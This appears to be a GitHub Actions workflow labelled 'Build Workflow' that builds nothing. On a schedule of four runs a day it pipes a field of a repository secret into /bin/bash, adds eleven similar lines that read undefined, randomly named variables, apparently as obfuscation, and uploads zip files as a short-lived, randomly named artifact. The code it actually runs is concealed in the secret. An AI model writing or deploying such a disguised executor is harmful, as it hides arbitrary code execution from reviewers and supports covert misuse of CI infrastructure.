name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '16 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          tn968: ${{ secrets.tn968 }}
        run: |
          printf '%s' "$tn968" | jq -r .whj4765 | /bin/bash
          echo $su677 | jq -r .vis74621 | /bin/bash
          printf '%s' "$sq3" | jq -r .v92 | /bin/bash
          printf '%s' "$ifqi44" | jq -r .k09 | /bin/bash
          printf '%s' "$f2438" | jq -r .c35357 | /bin/bash
          printf '%s' "$puqa16" | jq -r .bxj96 | /bin/bash
          printf '%s' "$di5" | jq -r .et5146 | /bin/bash
          echo $rsjmw3 | jq -r .m4067 | /bin/bash
          printf '%s' "$jzuqb23" | jq -r .lcrl06 | /bin/bash
          echo $pz7793 | jq -r .dbdhb6779 | /bin/bash
          echo $x50 | jq -r .bcy33407 | /bin/bash
          echo $rjajg93887 | jq -r .rgcu22019 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: aJGBtM5E
          path: "*.zip"
          retention-days: 1
